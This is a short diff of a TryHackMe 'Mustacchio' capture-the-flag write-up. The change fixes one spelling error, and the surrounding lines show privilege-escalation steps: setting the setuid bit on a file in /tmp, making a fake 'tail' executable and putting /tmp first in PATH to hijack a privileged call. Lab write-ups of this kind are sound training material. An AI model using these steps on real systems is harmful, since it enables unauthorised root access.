AssassinUKG/Writeups/tryhackme/mustacchio/writeup.md

 chmod u+s /tmp/b
 ```

-Save the file and then enter the next comamnds so we can run the executable.
+Save the file and then enter the next commands so we can run the executable.
 Then set the path to /tmp first to call our file before the real tail file.
 ```bash
 chmod +x tail
 export PATH=/tmp:$PATH